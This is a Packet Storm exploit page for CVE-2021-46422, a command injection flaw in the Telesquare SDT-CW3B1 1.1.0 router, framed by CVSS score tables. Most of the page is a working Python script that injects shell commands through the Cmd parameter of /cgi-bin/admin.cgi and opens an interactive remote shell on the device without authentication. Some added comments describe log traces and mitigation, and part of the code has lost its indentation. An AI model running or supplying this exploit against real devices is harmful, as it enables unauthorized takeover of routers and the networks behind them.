packetstorm | Bryan Leong | PACKETSTORM:167387
History: Jun 03, 2022 - 12:00 a.m.

Telesquare SDT-CW3B1 1.1.0 Command Injection

2022-06-03 00:00:00
Bryan Leong
packetstormsecurity.com
152

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

`#!/usr/bin/python3   
  
# Exploit Title: Telesquare SDT-CW3B1 1.1.0 - OS Command Injection  
# Date: 24th May 2022  
# Exploit Author: Bryan Leong <NobodyAtall>  
# Vendor Homepage: http://telesquare.co.kr/  
# CVE : CVE-2021-46422  
# Authentication Required: No  
  
import requests   
import argparse   
import sys  
from xml.etree import ElementTree  
  
def sysArgument():
    """Read the command line and return the value supplied for ``--host``.

    ``--host`` is declared as required, so argparse prints a usage message and
    exits when it is absent. The value is returned exactly as typed; nothing
    in this function validates or normalises it.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("--host", required=True, help="target hostname/IP")
    parsed = parser.parse_args()
    return parsed.host
  
def checkHost(host):
    """Issue one plain-HTTP GET to ``host`` and report that it answered.

    The response itself is not inspected: any reply, whatever its status code,
    counts as "alive". No timeout argument is passed to ``requests.get`` and
    only ``requests.exceptions.Timeout`` is handled, so every other request
    error propagates to the caller.

    Raises:
        SystemExit: carrying the Timeout error when the request times out.
    """
    target = "http://" + host

    print("[*] Checking host is it alive?")

    try:
        requests.get(target)
    except requests.exceptions.Timeout as err:
        raise SystemExit(err)
    else:
        # Only reached when the GET returned without raising.
        print("[*] The host is alive.")
  
# Proof-of-concept routine for CVE-2021-46422 (per the file header): it sends
# HTTP GET requests to /cgi-bin/admin.cgi with Command=sysCommand, places text
# in the Cmd query parameter, and prints the text of any <CmdResult> element
# found in the XML reply.
#
# NOTE(review): this paste has lost its indentation, so the nesting of the
# statements below (for example whether print('\n') belongs to the for loop or
# to the while loop) cannot be read from the text. The code is left exactly as
# published.
#
# Defender notes: the trace this routine leaves is a GET for
# /cgi-bin/admin.cgi carrying Command=sysCommand and a non-empty Cmd value;
# web or proxy logs showing that from a client that is not an administrator
# deserve investigation. Keeping the device's web management interface
# unreachable from untrusted networks removes the exposure. Whether fixed
# firmware exists is not stated on this page - check with the vendor.
def exploit(host):
# Plain HTTP; no credentials, cookies or tokens are attached to any request
# made in this function.
url = "http://" + host + "/cgi-bin/admin.cgi?Command=sysCommand&Cmd="

# Probe with an empty Cmd value: a 200 status is taken to mean the CGI
# endpoint exists.
rsl = requests.get(url)

if(rsl.status_code == 200):
print("[*] CGI script exist!")
print("[*] Injecting some shell command.")

# First request: Cmd is set to "id"; the returned text is used below as the
# evidence that the device acted on the parameter.
cmd = "id"

try:
# stream=True leaves the body unread so that ElementTree can parse it
# incrementally from the raw response object.
rsl = requests.get(url + cmd, stream=True)
xmlparser = ElementTree.iterparse(rsl.raw)

cmdRet = []

for event, elem in xmlparser:
if(elem.tag == 'CmdResult'):
cmdRet.append(elem.text)
# Bare except: any error raised above (network failure, non-XML body) ends the
# run with this message and exit status 0.
except:
print("[!] No XML returned from CGI script. Possible not vulnerable to the exploit")
sys.exit(0)

if(len(cmdRet) != 0):
print("[*] There's response from the CGI script!")
# NOTE(review): elem.text is None for an empty element, in which case .strip()
# would raise here - confirm.
print('[*] System ID: ' + cmdRet[0].strip())

print("[*] Spawning shell. type .exit to exit the shell", end="\n\n")
# Interactive loop: each line read from the operator is appended to the URL as
# the Cmd value and the CmdResult text of the reply is printed; ".exit" ends
# the process.
while(True):
cmdInput = input("[SDT-CW3B1 Shell]# ")

if(cmdInput == ".exit"):
print("[*] Exiting shell.")
sys.exit(0)

rsl = requests.get(url + cmdInput, stream=True)
xmlparser = ElementTree.iterparse(rsl.raw)


for event, elem in xmlparser:
if(elem.tag == 'CmdResult'):
print(elem.text.strip())

print('\n')

# Presumably pairs with the len(cmdRet) check: XML was parsed but held no
# CmdResult element.
else:
print("[!] Something doesn't looks right. Please check the request packet using burpsuite/wireshark/etc.")
sys.exit(0)

# Presumably pairs with the status_code check: the probe did not return 200.
# The status code is printed and the process exits with status 0.
else:
print("[!] CGI script not found.")
print(rsl.status_code)
sys.exit(0)
  
def main():
    """Entry point: read ``--host``, probe the host, then run the PoC routine.

    The same host string is handed unchanged to ``checkHost`` and ``exploit``.
    """
    target = sysArgument()

    checkHost(target)
    exploit(target)


# Run only when executed as a script, not when imported.
if __name__ == "__main__":
    main()
  
`

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C